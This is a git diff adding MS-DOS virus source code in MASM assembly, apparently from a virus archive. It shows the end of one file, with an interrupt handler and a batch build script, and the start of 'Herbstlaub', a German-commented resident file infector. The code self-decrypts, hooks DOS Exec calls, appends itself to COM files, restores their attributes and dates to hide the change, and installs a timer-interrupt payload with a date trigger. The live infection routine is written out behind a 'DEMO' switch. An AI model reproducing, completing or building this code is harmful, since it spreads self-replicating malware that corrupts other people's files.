+XI_066: AND CS:[ISR_Flags],NOT MASK R_in_1c ; +XI_067: JMP DWORD PTR CS:[Org_Int_1C] ; + ; +IF SWITCHABLE ; + ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Implementierung eines neuen in CMD_2F definierten internen Befehls. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_068 Label Near ; +Int_2F_ISR EQU XI_068 + PSPsize ; + CMP AH,0AEH ; + JNZ Int_2F_end ; + CMP DX,-1 ; + JNZ Int_2F_end ; + CMP AL,0 ; + JNZ Int_2F_2nd ; + CALL Decode_2F ; + JNZ Int_2F_end ; + DEC AL ; + IRET ; +Int_2F_2nd: CMP AL,1 ; + JNZ Int_2F_end ; + CALL Decode_2F ; + JNZ Int_2F_end ; + SAVE DS,DX,AX ; + MOV_S DS,CS ; + XOR [ISR_Flags],MASK ExtCom ; + MOV DX,OFFSET MSG_ON ; + TEST [ISR_Flags],MASK ExtCom ; + JZ XI_069 ; + MOV DX,OFFSET MSG_OFF ; +XI_069: MOV AH,9 ; + MSDOS ; + REST AX,DX,DS ; + AND BYTE PTR [SI],0 ; + IRET ; +Int_2F_end: JMP DWORD PTR CS:[Org_Int_2F] ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + 歜erpr乫en, ob der in CMD_2F definierte Befehl angesprochen wurde. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Decode_2F PROC NEAR ; + SAVE SI,DI,ES,CX ; + MOV CX,05 ; + MOV_S ES,CS ; + MOV DI,OFFSET Cmd_2F ; + CLD ; + REPE CMPSW ; + REST CX,ES,DI,SI ; + RET ; +Decode_2F ENDP ; + ; +ENDIF ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Okay, das war's. Zum Schlu noch einige Definitionen. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +EOFC EQU THIS WORD ; +XR_010 EQU OFFSET EOFC - 1 + FIRSTBASE ; +TEXT ENDS ; +IF2 ;----------------; +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 韧屯屯屯 (C) 1990 164A12565AA18213165556D3125C4B962712 屯屯屯屯图 +ENDIF ; +comment # +赏屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯突 + + So k攏nte ein Batch - Makefile aussehen : + + @cls + @if %1.==. goto nopar + @if not exist %1.asm goto noasm + @ctty nul + @del %1.obj + @del %1.lst + @del %1.crf + @del %1.ref + @del %1.map + @del %1.exe + @del %1.bin + @del _HLV_.COM + @ctty con + @masm /b63 %1,,%1,%1 %2 %3 %4; + @if not exist %1.obj goto masm_err + @link %1,,%1; + @if not exist %1.exe goto link_err + @exe2bin %1; + @if not exist %1.bin goto exe2_err + @cref %1; + @if not exist %1.ref goto cref_err + @echo >> %1.lst + @copy %1.lst+%1.map+%1.ref %1.t > nul + @del %1.lst > nul + @ren %1.t %1.lst > nul + @del %1.obj > nul + @del %1.crf > nul + @del %1.ref > nul + @del %1.map > nul + @del %1.exe > nul + @echo n %1.bin > md.inp + @echo l 11f >> md.inp + @echo a 110 >> md.inp + @echo add cx,20 >> md.inp + @echo. >> md.inp + @echo g =110 113 >> md.inp + @echo f 110 11e 20 >> md.inp + @echo e 110 '%1' >> md.inp + @echo f 100 10f 90 >> md.inp + @echo a 100 >> md.inp + @echo jmp 120 >> md.inp + @echo nop >> md.inp + @echo nop >> md.inp + @echo nop >> md.inp + @echo mov ax,4c00 >> md.inp + @echo int 21 >> md.inp + @echo. >> md.inp + @echo n _HLV_.com >> md.inp + @echo w >> md.inp + @echo q >> md.inp + @debug < md.inp > nul + @cls + @echo. + @echo 赏屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯突 + @echo 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 + @echo 喊鞍鞍鞍MAKEHLV erfolgreich beendet, _HLV_.com wurde erstellt.鞍昂 + @echo 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 + @echo 韧屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯图 + @echo. + @goto ende + :nopar + @echo FEHLER ! Mindestens ein Parameter ist erforderlich ! + @echo Syntax : MAKEHLV asmfile [switches] + @goto ende + :noasm + @echo FEHLER ! Die Datei %1.ASM ist nicht zu finden ! + @goto ende + :masm_err + @echo FEHLER ! %1.OBJ konnte nicht erstellt werden ! + @goto ende + :link_err + @echo FEHLER ! %1.EXE konnte nicht erstellt werden ! + @goto ende + :exe2_err + @echo FEHLER ! %1.BIN konnte nicht erstellt werden ! + @goto ende + :cref_err + @echo FEHLER ! %1.REF konnte nicht erstellt werden ! + :ende + +韧屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯图 +# +END + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 diff --git a/MSDOS/Virus.MSDOS.Unknown.cascspec.asm b/MSDOS/Virus.MSDOS.Unknown.cascspec.asm new file mode 100644 index 00000000..4ccbc830 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cascspec.asm @@ -0,0 +1,1183 @@ +PAGE 62,132 +TITLE _HLV_ (- Microsoft MASM 5.1 source -) +SUBTTL (C) 1990 164A12565AA18213165556D3125C4B962712 +.RADIX 16 +.LALL + +TRUE EQU 1 +FALSE EQU 0 + +MONTH EQU 9D +YEAR EQU 1991D + +DEMO EQU TRUE + +SWITCHABLE = TRUE +IFDEF _NOSWITCH +SWITCHABLE = FALSE +ENDIF + +comment # +赏屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯突 + + ===================== + H E R B S T L A U B + ===================== + + + SPRACHE: MASM 4.00 (+) [ fr乭ere Versionen brechen z.B. mit + *OUT OF MEMORY* (3.00) ab oder lassen + sogar den PC abst乺zen (1.10) ] + + ( Eine als Beispiel gedachte Batchdatei zur Steuerung der 歜ersetzung + ist am Ende dieses Quelltextes als Kommentar hinzugef乬t. ) + +韧屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯图 +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + W刪rend der 歜ersetzung zu auszugebende Meldungen, 1. Teil. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 +# +IF1 +REPT 50 +%Out +ENDM; +%Out 赏屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯突 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍谀哪哪哪哪哪哪哪哪哪哪哪堪鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊澳哪哪哪哪哪哪哪哪 H E R B S T L A U B 媚哪哪哪哪哪哪哪哪陌昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍滥哪哪哪哪哪哪哪哪哪哪哪侔鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +ENDIF +comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Einige Assembler - Makros. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 +# ; +MSDOS MACRO ; + INT 21 ; + ENDM ; +Wait_HRI_or_VRI MACRO ; + LOCAL _X_1, _X_2, _X_3 ; + MOV DX,03DA ; + CLI ; + _X_1: IN AL,DX ; + TEST AL,08 ; + JNZ _X_3 ; + TEST AL,01 ; + JNZ _X_1 ; + _X_2: IN AL,DX ; + TEST AL,01 ; + JZ _X_2 ; + _X_3 LABEL NEAR ; + ENDM ;------; +SAVE MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c ; + IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c> ; + IFNB <_X> ;------; + IFIDN <_X>, ; + PUSHF ; + ELSE ; + PUSH _X ; + ENDIF ; + ENDIF ; + ENDM ; + ENDM ;------; +REST MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c ; + IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c> ; + IFNB <_X> ;------; + IFIDN <_X>, ; + POPF ; + ELSE ; + POP _X ; + ENDIF ; + ENDIF ; + ENDM ; + ENDM ; +MOV_S MACRO S1,S2 ; + PUSH S2 ; + POP S1 ; + ENDM ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Start des Code-Segments, Segment Prefix Bytes werden n i c h t au- + tomatisch durch den Assembler erzeugt. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +TEXT SEGMENT ; + ASSUME CS:TEXT,DS:TEXT,ES:TEXT,SS:TEXT ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Einige das Verst刵dnis erleichternde Definitionen. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +NearJmp EQU 0E9 ; +PORT_B_8259A EQU 20 ; +EOI_8259A EQU 20 ; +PORT_B_8255 EQU 61 ; +FIRSTCONST EQU 0131 ; +FIRSTBASE EQU FIRSTCONST - OFFSET XI_001 ;-----; +FIRSTBASE2 EQU (FIRSTCONST + OFFSET XI_005 - XI_001) ; +DeCrptd EQU 0 ;-----; +EnCrptd EQU 1 ; +BIOSDATASEG EQU 040 ; +MonoBase EQU 0B000 ; +ColorBase EQU 0B800 ; +B_VIDPAGE EQU THIS WORD + 04E ; +B_TIMERVAR EQU THIS WORD + 06C ; +TimerInt EQU 1C ; +DOS EQU 21 ; +DOS_multi EQU 2F ; +MS_SetDTA EQU 1A ; + DTA_in_PSP EQU 80 ; +MS_SetInt EQU 25 ; +MS_GetDateTime EQU 2A ; +MS_GetVer EQU 30 ; + DOS_v_02 EQU 2 ; +MS_GetInt EQU 35 ; +MS_Open EQU 3Dh ; + Read_Only EQU 0 ; + Read_Write EQU 2 ; +MS_Close EQU 3E ; +MS_Read EQU 3F ; +MS_Write EQU 40 ; +MS_MoveFP EQU 42 ; + OfsFrmTop EQU 0 ; + OfsFrmEnd EQU 02 ; +MS_GetFileAttr EQU 4300 ; +MS_SetFileAttr EQU 4301 ; + Attr_A EQU 20 ; + Attr_SHR EQU 7 ; + Attr_ASHR EQU Attr_A OR Attr_SHR ; +MS_AllocMem EQU 48 ; +MS_ReleaseMem EQU 49 ; + MemCBsig EQU THIS BYTE + 0 ; + MemCBowned EQU THIS WORD + 1 ; + MemCBsize EQU THIS WORD + 3 ; +MS_Exec EQU 4Bh ; + MS_Exec_SF0 EQU 0 ; + Virus_fun EQU 0ffh ; + Virus_Sig EQU 55AA ; +MS_SetPSP EQU 50 ; + PSPsize EQU 00100 ; + PSPCurCom EQU THIS WORD + 016 ; + PSPEnv EQU THIS WORD + 02C ; + PSP_SegJFB EQU THIS WORD + 036 ; + NoEnv EQU 0 ; +MS_GetFileDate EQU 5700 ; +MS_SetFileDate EQU 5701 ; +PSP_100 EQU THIS WORD + PSPsize ; +PSP_102 EQU THIS BYTE + PSPsize + 2 ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Ab hier wird Objektcode erzeugt, Datenbereich Nr. 1. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Crypt1 DB 0 ; +Crypt2 EQU OFFSET Crypt1 + FIRSTBASE ; +Crypt3 EQU Crypt1 + PSPsize ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Einsprungstelle, entschl乻seln des Virus falls notwendig. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_000: CLI ; + MOV BP,SP ; + CALL XI_001 ; +XI_001: POP BX ; + SUB BX,FIRSTCONST ; + TEST BYTE PTR CS:[BX+Crypt2],EnCrptd ; + JZ XI_003 ; + LEA SI,[BX + XR_000] ; + MOV SP,OFFSET EOFC-OFFSET XI_003 ; +XI_002: XOR [SI],SI ; + XOR [SI],SP ; + INC SI ; + DEC SP ; + JNZ XI_002 ; +XI_003 LABEL NEAR ; + XR_000 EQU OFFSET XI_003 + FIRSTBASE ; + XR_001 EQU XI_003 + PSPsize ; + MOV SP,BP ; + JMP SHORT XI_004 ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Datenbereich 2. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; + XD_000 DW PSPsize ; +Disp_to_com_1 EQU OFFSET XD_000 + FIRSTBASE ; + XD_001 DW 9090 ; +Disp_to_com_2 EQU OFFSET XD_001 + FIRSTBASE ; + XD_002 DW 9090 ; +Initial_AX EQU OFFSET XD_002 + FIRSTBASE ; + XD_003 EQU THIS WORD ; + XD_004 EQU THIS BYTE + 2 ; + NOP ; + NOP ; + NOP ; +Org1stInstr_s1 EQU OFFSET XD_003 + FIRSTBASE ; +Org1stInstr_t1 EQU XD_003 + PSPsize ; +Org1stInstr_t2 EQU XD_003 + PSPsize + 1 ; +Org1stInstr_s2 EQU OFFSET XD_004 + FIRSTBASE ; + XD_005 DW 2 dup ( 9090 ) ; +Org_Int_1C EQU XD_005 + PSPsize ; + XD_006 DW 2 dup ( 9090 ) ; +Org_int_21s EQU OFFSET XD_006 + FIRSTBASE ; +Org_Int_21t EQU XD_006 + PSPsize ; + ; +IF SWITCHABLE ; + ; + XD_007 DW 2 dup ( 9090 ) ; +Org_Int_2F EQU XD_007 + PSPsize ; + XD_008 DB 5, "_HLV_ " ; +Cmd_2F EQU XD_008 + PSPsize ; + XD_009 DB 'HLV is on',0Dh,0Ah,'$' ; +Msg_On EQU XD_009 + PSPsize ; + XD_010 DB 'HLV is off',0Dh,0Ah,'$' ; +Msg_Off EQU XD_010 + PSPsize ; + ; +ENDIF ; + ; + XD_011 DW 9090 ; +File_Attributes EQU XD_011 + PSPsize ; + XD_012 DW 9090 ; +File_Date EQU XD_012 + PSPsize ; + XD_013 DW 9090 ; +File_Time EQU XD_013 + PSPsize ; + XD_014 DW 2 dup ( 9090 ) ; +Pathname EQU XD_014 + PSPsize ; + XD_015 DW 2 dup ( 9090 ) ; +File_Size_lsb EQU XD_015 + PSPsize ; +File_Size_msb EQU XD_015 + PSPsize + 2 ; + XD_016 DB NearJmp ; +FirstOpCode_1 EQU XD_016 + PSPsize ; + XD_017 DW 9090 ; +FirstOpCode_2 EQU XD_017 + PSPsize ; + XD_018 DB 90 ; +Num_of_Col EQU XD_018 + PSPsize ; + XD_019 DB 90 ; +Last_Line EQU XD_019 + PSPsize ; + XD_020 DB 90 ; +Prevent_Snow? EQU XD_020 + PSPsize ; +Last_Pair EQU THIS WORD + PSPsize ; + XD_021 DB 90 ; + XD_022 DB 90 ; +Last_Char EQU XD_021 + PSPsize ; +Last_Attr EQU XD_022 + PSPsize ; +RecTyp1 RECORD ExtCom:1, Recf_1:1, R_in_1c:1 ; + XD_023 RecTyp1 <0,0,0> ; +ISR_Flags EQU XD_023 + PSPsize ; + XD_024 DW 9090 ; +Seg_of_VRAM EQU XD_024 + PSPsize ; + XD_025 DW 9090 ; +Page_offset EQU XD_025 + PSPsize ; + XD_026 DW 9090 ; +Speed EQU XD_026 + PSPsize ; + XD_027 DW 9090 ; +XR_002 EQU XD_027 + PSPsize ; + XD_028 DW 9090 ; +XR_003 EQU XD_028 + PSPsize ; + XD_029 DW 9090 ; +Num_of_char EQU XD_029 + PSPsize ; + XD_030 DW 9090 ; +XR_004 EQU XD_030 + PSPsize ; + XD_031 DW 7 dup ( 9090 ) ; +FirstRandom EQU XD_031 + PSPsize ; +LastRandom EQU This Word + PSPsize ; + DW 9090 ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Installieren u. relozieren falls notwendig. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_004: CALL XI_005 ; +XI_005 LABEL NEAR ; +XR_005 EQU XI_005 + PSPsize ; + POP BX ; + SUB BX,FIRSTBASE2 ; + MOV CS:[BX+Disp_to_com_2],CS ; + MOV CS:[BX+Initial_AX],AX ; + MOV AX,CS:[BX+Org1stInstr_s1] ; + MOV [PSP_100],AX ; + MOV AL,CS:[BX+Org1stInstr_s2] ; + MOV [PSP_102],AL ; + PUSH BX ; + MOV AH,MS_GetVer ; + MSDOS ; + POP BX ; + CMP AL,DOS_v_02 ; + JB XI_006 ; + MOV AX,MS_Exec * 100 + Virus_fun ; + XOR DI,DI ; + XOR SI,SI ; + MSDOS ; + CMP DI,Virus_sig ; + JNZ XI_007 ; +XI_006: STI ; + MOV_S ES,DS ; + MOV AX,CS:[BX+Initial_AX] ; + JMP DWORD PTR CS:[BX+Disp_to_com_1] ; +XI_007: PUSH BX ; + MOV AX,MS_GetInt * 100 + DOS ; + MSDOS ; + MOV AX,BX ; + POP BX ; + MOV CS:[BX+Org_int_21s],AX ; + MOV CS:[BX+Org_int_21s + 2],ES ;------------; + MOV AX, (OFFSET EOFC - OFFSET Crypt1) SHR 4 + 11 ; + MOV BP,CS ;------------; + DEC BP ; + MOV ES,BP ; + MOV SI,CS:[PSPCurCom] ; + MOV ES:[MemCBowned],SI ; + MOV DX,ES:[MemCBsize] ; + MOV ES:[MemCBsize],AX ; + MOV ES:[MemCBsig],'M' ; + SUB DX,AX ; + DEC DX ; + INC BP ; + ADD BP,AX ; + INC BP ; + MOV ES,BP ; + PUSH BX ; + MOV AH,MS_SetPSP ; + MOV BX,BP ; + MSDOS ; + POP BX ; + XOR DI,DI ; + MOV_S SS,ES ; + PUSH DI ; + LEA DI,[BX+XR_010] ; + MOV SI,DI ; + MOV CX,OFFSET EOFC ; + STD ; + REPZ MOVSB ; + PUSH ES ; + LEA CX,[BX+XR_006] ; + PUSH CX ; + RETF ; +XI_008 LABEL NEAR ; +XR_006 EQU OFFSET XI_008 + FIRSTBASE ; + MOV CS:[BX+Disp_to_com_2],CS ; + LEA CX,[BX+Crypt2] ; + REPZ MOVSB ; + MOV CS:[PSP_SegJFB],CS ; + DEC BP ; + MOV ES,BP ; + MOV ES:[MemCBsize],DX ; + MOV ES:[MemCBsig],'Z' ; + MOV ES:[MemCBowned],CS ; + INC BP ; + MOV ES,BP ; + MOV_S ES,DS ; + MOV_S DS,CS ; + LEA SI,[BX+Crypt2] ; + MOV DI,PSPsize ; + MOV CX,OFFSET EOFC ; + CLD ; + REPZ MOVSB ; + PUSH ES ; + LEA AX,[XR_007] ; + PUSH AX ; + RETF ; +XI_009 LABEL NEAR ; +XR_007 EQU XI_009 + PSPsize ; + MOV CS:[PSPEnv],NoEnv ; + MOV CS:[PSPCurCom],CS ; + PUSH DS ; + LEA DX,[XR_008] ; + MOV_S DS,CS ; + MOV AX,MS_SetInt * 100 + DOS ; + MSDOS ; + POP DS ; + MOV AH,MS_SetDTA ; + MOV DX,DTA_in_PSP ; + MSDOS ; + SAVE DS,ES,SI,DI,CX ; + MOV_S ES,CS ; + MOV CX,BIOSDATASEG ; + MOV DS,CX ; + MOV DI,OFFSET FirstRandom ; + MOV SI,OFFSET B_TIMERVAR ; + MOV CL,8 ; + CLD ; + REPZ MOVSW ; + REST CX,DI,SI,ES,DS ; + ; +IF SWITCHABLE ; + ; + PUSH DS ; + MOV AX,MS_GetInt * 100 + DOS_multi ; + MSDOS ; + MOV CS:[Org_Int_2F],BX ; + MOV CS:[Org_Int_2F + 2],ES ; + MOV AX,MS_SetInt * 100 + DOS_multi ; + MOV DX,offset Int_2F_ISR ; + MOV_S DS,CS ; + MSDOS ; + POP DS ; + ; +ENDIF ; + ; + OR CS:[ISR_Flags],MASK ExtCom ; + MOV AH,MS_GetDateTime ; + MSDOS ; + CMP CX,YEAR ; + JZ XI_010 ; + JMP SHORT XI_011 ; +XI_010: CMP DH,MONTH ; + JB XI_011 ; + AND CS:[ISR_Flags],NOT MASK ExtCom ; +XI_011: MOV AX,1518 ; + CALL Random ; + INC AX ; + MOV CS:[XR_002],AX ; + MOV CS:[XR_003],AX ; + MOV CS:[XR_004],1 ; + MOV AX,MS_GetInt * 100 + TimerInt ; + MSDOS ; + MOV CS:[Org_Int_1C],BX ; + MOV CS:[Org_Int_1C + 2],ES ; + PUSH DS ; + MOV AX,MS_SetInt * 100 + TimerInt ; + MOV DX,OFFSET XR_009 ; + MOV_S DS,CS ; + MSDOS ; + POP DS ; +XI_012: MOV BX,OFFSET XR_005 - (FIRSTBASE2) ; + JMP XI_006 ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Neue Interrupt 21(h) Behandlungsroutine ( ver刵dert Exec - Funktion ). +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_013 LABEL NEAR ; +XR_008 EQU XI_013 + PSPsize ; + CMP AH,MS_Exec ; + JZ XI_016 ; +XI_014: JMP DWORD PTR CS:[Org_Int_21t] ; +XI_015: MOV DI,Virus_Sig ; + LES AX,CS:DWORD PTR [Org_Int_21t] ; + MOV DX,CS ; + IRET ; +XI_016: CMP AL,Virus_fun ; + JZ XI_015 ; + CMP AL,MS_Exec_SF0 ; + JNZ XI_014 ; + SAVE F,AX,BX,CX,DX,SI,DI,BP,ES,DS ; + MOV CS:[Pathname],DX ; + MOV CS:[Pathname + 2],DS ; + MOV_S ES,CS ; + MOV AX,MS_Open * 100 + Read_Only ; + MSDOS ; + JB XI_018 ; + MOV BX,AX ; + MOV AX,MS_GetFileDate ; + MSDOS ; + MOV CS:[File_Date],DX ; + MOV CS:[File_Time],CX ; + MOV AH,MS_Read ; + MOV_S DS,CS ; + MOV DX,OFFSET Org1stInstr_t1 ; + MOV CX,3 ; + MSDOS ; + JB XI_018 ; + CMP AX,CX ; + JNZ XI_018 ; + MOV AX,MS_MoveFP * 100 + OfsFrmEnd ; + XOR CX,CX ; + XOR DX,DX ; + MSDOS ; + MOV CS:[File_Size_lsb],AX ; + MOV CS:[File_Size_msb],DX ; + MOV AH,MS_Close ; + MSDOS ;---------------; + CMP CS:[Org1stInstr_t1], 'Z' * 100 + 'M' ; + JNZ XI_017 ; + JMP XI_025 ; +XI_017: CMP CS:[File_Size_msb],+0 ; + JA XI_018 ; + CMP CS:[File_Size_lsb],offset Crypt1-offset EOFC-20 ; + JBE XI_019 ; +XI_018: JMP XI_025 ; +XI_019: CMP BYTE PTR CS:[Org1stInstr_t1],NearJmp ; + JNZ XI_020 ; + MOV AX,CS:[File_Size_lsb] ; + ADD AX,OFFSET Crypt1 - offset EOFC - 2 ; + CMP AX,CS:[Org1stInstr_t2] ;---------------; + JZ XI_018 ; + ; +IF DEMO ; +XI_020: CALL DEMO_Infect ; + JMP XI_025 ; + ; +IF2 ;----------------; +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍吧屯屯屯屯屯屯屯屯突鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 Demo - Version, 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 k e i n Virus. 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍 +ENDIF ;----------------; +ELSE ; +IFDEF _DANGER ; +XI_020 MOV AX,MS_GetFileAttr ; + LDS DX,CS:DWORD PTR [Pathname] ; + MSDOS ; + JB XI_018 ; + MOV CS:[File_Attributes],CX ; + XOR CL,Attr_A ; + TEST CL,Attr_ASHR ; + JZ XI_021 ; + MOV AX,MS_SetFileAttr ; + XOR CX,CX ; + MSDOS ; + JB XI_018 ; +XI_021: MOV AX,MS_Open * 100 + Read_Write ; + MSDOS ; + JB XI_018 ; + MOV BX,AX ; + MOV AX,MS_MoveFP * 100 + OfsFrmEnd ; + XOR CX,CX ; + XOR DX,DX ; + MSDOS ; + CALL Append_Virus ; + JNB XI_022 ; + MOV AX,MS_MoveFP * 100 + OfsFrmTop ; + MOV CX,CS:[File_Size_msb] ; + MOV DX,CS:[File_Size_lsb] ; + MSDOS ; + MOV AH,MS_Write ; + XOR CX,CX ; + MSDOS ; + JMP SHORT XI_023 ; +XI_022: MOV AX,MS_MoveFP * 100 + OfsFrmTop ; + XOR CX,CX ; + XOR DX,DX ; + MSDOS ; + JB XI_023 ; + MOV AX,CS:[File_Size_lsb] ; + ADD AX,-2 ; + MOV CS:[FirstOpCode_2],AX ; + MOV AH,MS_Write ; + MOV DX,OFFSET FirstOpCode_1 ; + MOV CX,3 ; + MSDOS ; +XI_023: MOV AX,MS_SetFileDate ; + MOV DX,CS:[File_Date] ; + MOV CX,CS:[File_Time] ; + MSDOS ; + MOV AH,MS_Close ; + MSDOS ; + MOV CX,CS:[File_Attributes] ; + TEST CL,Attr_SHR ; + JNZ XI_024 ; + TEST CL,Attr_A ; + JNZ XI_025 ; +XI_024: MOV AX,MS_SetFileAttr ; + LDS DX,CS:DWORD PTR [Pathname] ; + MSDOS ; +IF2 ;----------------; +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍吧屯屯屯屯屯屯屯屯突鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 KEIN DEMO, 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 scharfer Virus. 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍 +ENDIF ; +ELSE ; + .ERR ; +ENDIF ; +ENDIF ; +IF SWITCHABLE ; +IF2 ; +%Out 喊鞍鞍鞍鞍鞍赏屯屯屯屯褪屯屯屯屯屯屯屯屯褪屯屯屯屯屯话鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍 Neuer interner MSDOS Befehl '_HLV_' ! 